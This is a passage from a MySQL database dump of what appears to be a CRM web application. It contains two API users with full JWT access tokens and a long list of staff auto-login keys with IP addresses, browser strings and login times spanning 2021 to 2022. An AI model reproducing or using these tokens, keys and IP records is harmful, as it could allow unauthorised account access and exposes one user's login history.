-- Dumping data for table `tbluser_api`
--

INSERT INTO `tbluser_api` (`id`, `user`, `name`, `token`, `expiration_date`, `permission_enable`) VALUES
(1, 'contact', 'contact', 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoiY29udGFjdCIsIm5hbWUiOiJjb250YWN0IiwiQVBJX1RJTUUiOjE2NDA2OTg0MDV9.IO4uOkem8jBbhxXHYnqrktPUoeQWv_VTfrfTqsvWYQA', '2021-12-28 20:33:00', 0),
(3, 'mobileapp', 'Mobileapp', 'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyIjoibW9iaWxlYXBwIiwibmFtZSI6Ik1vYmlsZWFwcCIsIkFQSV9USU1FIjoxNjQ3MjQwNDk2fQ.64o0NK6ZHAK795QEhP_b0ifl_oDhdKI9cbC-zWfmvvE', '2030-03-14 13:47:00', 0);

-- --------------------------------------------------------

--
-- Table structure for table `tbluser_api_permissions`
--

CREATE TABLE `tbluser_api_permissions` (
  `api_id` int(11) NOT NULL,
  `feature` varchar(50) NOT NULL,
  `capability` varchar(50) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tbluser_auto_login`
--

CREATE TABLE `tbluser_auto_login` (
  `key_id` char(32) NOT NULL,
  `user_id` int(11) NOT NULL,
  `user_agent` varchar(150) NOT NULL,
  `last_ip` varchar(40) NOT NULL,
  `last_login` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
  `staff` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tbluser_auto_login`
--

INSERT INTO `tbluser_auto_login` (`key_id`, `user_id`, `user_agent`, `last_ip`, `last_login`, `staff`) VALUES
('2959eeefe26dbe30f13f62724c3eb3b5', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15', '1.53.205.24', '2021-12-27 09:08:15', 1),
('6933644484b0c425471cdce0f1a36cc7', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/93.0.4577.78 Mobile/15E148 Safari/604.1', '171.244.222.198', '2021-12-28 02:54:51', 1),
('768651b0e6c29b361522fd9e8e70377f', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36', '1.53.205.253', '2021-12-28 08:13:23', 1),
('ca9cad80d258b3e42ef0aaf8f02a6851', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36', '171.252.155.125', '2022-01-04 21:09:58', 1),
('891d1d97a7af51601e51fea059e36c1b', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36', '115.77.188.167', '2022-01-07 23:33:48', 1),
('6ded4b60d8b6f33836adc5fc44e42030', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15', '115.77.188.167', '2022-01-08 03:43:24', 1),
('b86379e31c6b9da92958c577a743b2cb', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15', '42.116.209.103', '2022-01-08 07:37:40', 1),
('40c29933e88ab7f8cde71d3c55957a56', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36', '222.254.215.55', '2022-01-08 18:58:59', 1),
('eed1a122c84451d4fdf8a0a4afc3a5f0', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15', '42.116.209.103', '2022-01-09 05:42:14', 1),
('6d44db8d9eaaca85db9b99ae69d16e39', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15', '42.116.209.103', '2022-01-09 07:42:24', 1),
('23333238877df8f279b2ea15b615a8e2', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36', '115.77.188.167', '2022-01-10 02:12:54', 1),
('cbdb7c57c56141fc8109a8bbfb2435be', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/93.0.4577.78 Mobile/15E148 Safari/604.1', '171.253.1.15', '2022-01-10 18:31:59', 1),
('1eb1b9dce851e8bbbd4513b44931c142', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15', '115.77.188.167', '2022-01-12 02:36:33', 1),
('81e5d83bff90dfde72771df0ea3a1e02', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15', '42.116.209.103', '2022-01-12 08:05:30', 1),
('e34f56e7f905f0da0dc22903c70784cb', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15', '42.116.209.103', '2022-01-12 09:39:51', 1),
('51420f726ab43c4ba369d6e33d3448e4', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15', '1.52.82.6', '2022-01-17 07:51:15', 1),
('cb7cbc2b24d9776f1574122032a94581', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36', '115.77.188.167', '2022-01-18 22:02:31', 1),
('7a1b508604db2de91dea2b15a7a242fa', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36', '113.185.79.253', '2022-01-24 20:12:27', 1),
('480dd6f71adaf3d7cf988cf864c1b138', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Mobile/15E148 Safari/604.1', '14.161.9.172', '2022-02-06 18:51:01', 1),
('71af2302bcae32cfc70bf2076a37cfd7', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36', '222.254.193.215', '2022-02-09 21:31:08', 1),
('522b297b4076393fa45ccac826a0e4d6', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Mobile/15E148 Safari/604.1', '27.64.208.135', '2022-02-12 06:46:12', 1),
('003da423f25411e72c69626f0526f9c5', 1, 'Mozilla/5.0 (iPad; CPU OS 14_8 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/96.0.4664.53 Mobile/15E148 Safari/604.1', '42.116.89.154', '2022-02-12 08:30:59', 1),
('5a2b9364ca32dc32ed8cf01edb2e256a', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36', '115.77.188.167', '2022-02-20 21:28:48', 1),
('e706d65400f99a0c15b3d2daf077f152', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Mobile/15E148 Safari/604.1', '115.77.188.167', '2022-02-23 07:56:27', 1),
('82501de4092cb88dab86c0d870aa59fb', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36', '222.254.193.215', '2022-02-28 18:41:30', 1),
('444ba30b3cba48bcc3af953cee30a318', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36', '222.254.193.215', '2022-03-02 00:32:31', 1),
('4ad07411015f43802eec528ecad2253a', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Edg/98.0.1108.62', '222.254.193.215', '2022-03-02 19:44:10', 1),
('819c29620fe64e4834a7d1428949f0df', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.43', '42.119.42.13', '2022-03-08 05:25:06', 1),
('bd0be10f014299a9e36f4b0477816359', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36', '42.119.42.13', '2022-03-08 07:24:36', 1),
('7b056fed3731614a3862f0dceb80838e', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Mobile/15E148 Safari/604.1', '115.77.188.167', '2022-03-09 20:33:41', 1),
('9f392f42a1de301f9bed5ee0f5cba6e3', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15', '113.23.3.180', '2022-03-10 07:17:17', 1),
('f46e69d842bdd795a96143bda032c132', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36', '171.252.155.125', '2022-03-13 23:35:49', 1),
('e3560c8c3f4a0a4c81bc8b9ad5d918b7', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36', '113.187.198.218', '2022-03-20 23:29:32', 1),
('f42435a07d837d1bbe598bdaf16f176d', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Mobile/15E148 Safari/604.1', '125.235.215.85', '2022-03-31 22:15:05', 1),
('40de7b85785aefbb2f6b3f13280731fc', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36', '183.80.22.246', '2022-04-05 06:34:46', 1),
('3685394175f45334180209c40051e0bd', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/100.0.4896.77 Mobile/15E148 Safari/604.1', '27.66.52.161', '2022-04-09 17:52:48', 1),
('f76dfc57a4ae0daf06d8cc6957898f41', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Mobile/15E148 Safari/604.1', '27.66.52.161', '2022-04-09 18:20:00', 1),
('08b30ee6114a3a600313a90892f14f52', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Mobile/15E148 Safari/604.1', '42.115.238.127', '2022-04-11 01:23:17', 1),
('8f0f62964e35d7fed515b9e436c00285', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Mobile/15E148 Safari/604.1', '42.115.238.127', '2022-04-11 02:42:33', 1),
('1e2a7f7a4d939471543bf87071e80526', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Mobile/15E148 Safari/604.1', '42.115.238.127', '2022-04-11 02:43:42', 1),
('9a56339d40140b45ed804b90ad161661', 1, 'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-M127F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.2 Chrome/92.0.4515.166 Mobile Safari/537.3', '103.199.70.133', '2022-04-12 18:50:59', 1),
('dd0d27b27da3f645890145875172c2c9', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15', '115.77.188.167', '2022-04-15 06:58:54', 1),
('d4c26c0dfce63ae053d3c0339015fb60', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Mobile/15E148 Safari/604.1', '115.79.27.105', '2022-04-18 19:57:52', 1),
('beb3eb3177c6b5e52803acb2f3f257bc', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36', '222.254.193.215', '2022-04-21 22:24:48', 1),
('59e643a4412478230e4d28bd14c61ca6', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15', '115.77.188.167', '2022-04-24 10:16:31', 1),
('36e80e7785d881886d83cba5b6918e8d', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36', '222.254.196.131', '2022-04-26 19:27:04', 1),
('9f46cbd2505e3e5b8f906f16a2d0d72b', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36', '14.179.149.210', '2022-04-30 22:56:38', 1),
('153991e69c817e15a1268c4e2cc9bf02', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36', '222.254.196.131', '2022-05-03 19:05:21', 1),
('ab24b9136a30152831aa430186519338', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Mobile/15E148 Safari/604.1', '125.235.186.132', '2022-05-05 18:27:07', 1),
('2bf4f4e559e4f3dd0fdfccf7a3cc7b4b', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36', '115.77.188.167', '2022-05-06 02:05:44', 1),
('ae797ff71f59bfb2fda2562a47620ded', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36', '222.254.196.131', '2022-05-06 21:27:46', 1),
('d45b142a021dd810e01973c92ead8eec', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36', '222.254.196.131', '2022-05-09 19:43:47', 1),
('abf95b0e1525227c5436ea13494c044b', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15', '115.77.188.167', '2022-05-11 23:32:21', 1),
('cfbcb281b947dbff694688320392d46b', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36', '115.77.188.167', '2022-05-14 02:40:11', 1),
('321137ceadd6aad63f8ae53ff84b8533', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36', '115.77.188.167', '2022-05-14 02:49:22', 1),
('93cd3374bb9a3507d0be46978fa088d4', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36', '115.77.188.167', '2022-05-15 03:48:06', 1),
('b21209bbf8f68512fb347f3df04c89b2', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36', '115.77.188.167', '2022-05-21 00:29:15', 1),
('06f2f37c4725128eac1460a556031df1', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Mobile/15E148 Safari/604.1', '42.114.46.87', '2022-05-21 23:19:09', 1),
('01a7852b7854d5d0c26f074ea6892fe8', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36', '222.254.211.246', '2022-05-30 03:49:27', 1),
('6a3a9f97300686338290192113c1b113', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36', '222.254.211.246', '2022-05-31 19:28:36', 1),
('57bc43df93f68a2bc313d338861f9eab', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36', '115.77.188.167', '2022-06-03 21:55:14', 1),
('48ffdeaf814ee3b8b1242917b9ff719a', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36', '115.77.188.167', '2022-06-13 20:07:08', 1),
('dfb4a172c8f4f55ecb611b6d6e322ee1', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36', '222.254.210.206', '2022-06-15 21:47:26', 1),
('87ea0fc468bcf157c883dc2885a0f5bf', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36', '222.254.210.206', '2022-06-24 19:34:01', 1),
('441d4f56afd2fec991f80b037034b05c', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36', '222.254.210.206', '2022-06-26 19:22:43', 1),
('a2ce88e85ba827aeb25d6f78a9e5623f', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Mobile/15E148 Safari/604.1', '222.254.210.206', '2022-06-26 20:49:24', 1),
('c00de86bbe030c804670ffa54363afa9', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Mobile/15E148 Safari/604.1', '171.253.33.107', '2022-06-27 00:50:51', 1),
('47eb50d1a21d09b09c586ffa4b0a379e', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Mobile/15E148 Safari/604.1', '42.113.172.15', '2022-06-27 07:51:17', 1),
('153169fb985761f31e22e2e3ba4147e6', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko)  Mobile/15E148 Safari/604.1', '42.113.172.15', '2022-06-30 04:25:54', 1),
('243f4f955773505a9d4d4dea5a7f789c', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Mobile/15E148 Safari/604.1', '113.22.89.171', '2022-07-07 06:48:17', 1),
('1297f9c472a004babecd65e46a4d4460', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 13_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/97 Mobile/15E148 Version/15.0', '113.185.76.154', '2022-07-18 18:28:42', 1),
('c950c991d76c49abf989604873e0ee40', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Safari/605.1.15', '171.224.83.69', '2022-07-24 18:05:32', 1),
('964b486299ad73c01528651634e74dee', 1, 'Mozilla/5.0 (iPad; CPU OS 15_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/102.0.5005.87 Mobile/15E148 Safari/604.1', '42.117.177.171', '2022-07-29 07:37:23', 1),
('bd56f4c7d1ec0bb4bdaebc69c6bdb027', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36', '222.254.215.245', '2022-07-29 23:51:55', 1),
('022e012cb348cddd509942bee8b9629f', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36', '222.254.215.245', '2022-08-01 20:53:35', 1),
('7ffa3ca4986a91d7dfae5098745b835d', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36', '115.77.188.167', '2022-08-07 22:33:38', 1),
('debd390a49a66cfe7e15a27a7e42ead4', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36', '115.77.188.167', '2022-08-09 23:51:09', 1),
('124caaa9fdffdadfc96f64e2404aefd0', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36', '115.77.188.167', '2022-08-11 00:22:50', 1),
('2b90ed125f8f343c4f4a20d1a847521e', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6 Mobile/15E148 Safari/604.1', '171.253.138.12', '2022-08-11 02:59:12', 1),
('6cd4797ba7f4b31d0d46f0595df1630b', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36', '115.77.188.167', '2022-08-12 01:45:07', 1),
('effcfe4e7edf827753673d2cd86435b4', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36 Edg/104.0.1293.54', '42.118.72.92', '2022-08-15 06:57:40', 1),
('16a2d8411169490100dbd7e07c33f5c2', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36', '115.77.188.167', '2022-08-29 21:05:04', 1),
('ea98a8d19e1bfcc6c588d5c433df8a51', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Mobile/15E148 Safari/604.1', '42.115.160.42', '2022-08-30 11:59:41', 1),
('d3d3e6e93bf8dd8d7769b1b21f8152a2', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36', '115.77.188.167', '2022-09-06 20:28:45', 1),
('bff6de269331424aa08c689ba1a7e540', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36', '115.77.188.167', '2022-09-12 19:07:11', 1),
('b37b452c691345c25932405fde34306e', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15', '1.53.41.59', '2022-09-13 04:06:50', 1),
('070fa107381da1066d064d45bfa371c4', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36', '115.77.188.167', '2022-09-14 00:00:58', 1),
('ee4d1b39eeb0b9087439a8e81aae7611', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36', '222.254.194.201', '2022-09-20 21:55:30', 1),
('c77a073a3a5b4dc6fdbd51fc18d98395', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36', '115.77.188.167', '2022-09-28 23:54:46', 1),
('662f418936f035c750ca1cbdc6fb443f', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36', '115.77.188.167', '2022-09-29 20:16:44', 1),
('2168097de16a0a10e87e04259cc2799f', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36', '14.161.40.187', '2022-10-01 22:45:01', 1),
('ea32811996ee54539aa3e9d0e9946375', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_0_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Mobile/15E148 Safari/604.1', '171.224.240.57', '2022-10-02 18:14:51', 1),
('8d34b3d5bd06b963a7ae3051e8ddc0ea', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36', '222.254.194.201', '2022-10-04 01:44:52', 1),
('a71c39a94018bf8c489517631f9bd649', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36', '115.77.188.167', '2022-10-04 22:07:09', 1),
('85af81e1eddd3f5ba56fb452246ac53a', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36', '1.54.12.70', '2022-10-11 18:46:04', 1),
('86719d8f50b9b3e201cb786deeeae9c7', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', '222.254.194.201', '2022-10-16 19:28:03', 1),
('9262f13cd19bc49484eb682bf076368a', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', '115.77.188.167', '2022-10-19 20:40:47', 1),
('107ce01db8d50372a6277282371a6476', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', '115.77.188.167', '2022-10-24 00:21:36', 1),
('776d7dc3760505435c5df314e15719ea', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', '115.77.188.167', '2022-10-26 20:31:11', 1),
('7284a32890034daaa62984d6d3f2a9de', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', '115.77.188.167', '2022-10-31 02:01:18', 1),
('67355e48cbf9afa3f1463d0f79129e49', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Mobile/15E148 Safari/604.1', '171.253.186.223', '2022-10-31 05:03:18', 1),
('c1e1ad7dc95233972e2de96c2b3f0bbd', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36', '115.77.188.167', '2022-11-03 02:43:32', 1),
('97e4026581e6182ee8fe910502253b16', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.28', '58.187.212.172', '2022-11-07 21:03:25', 1),
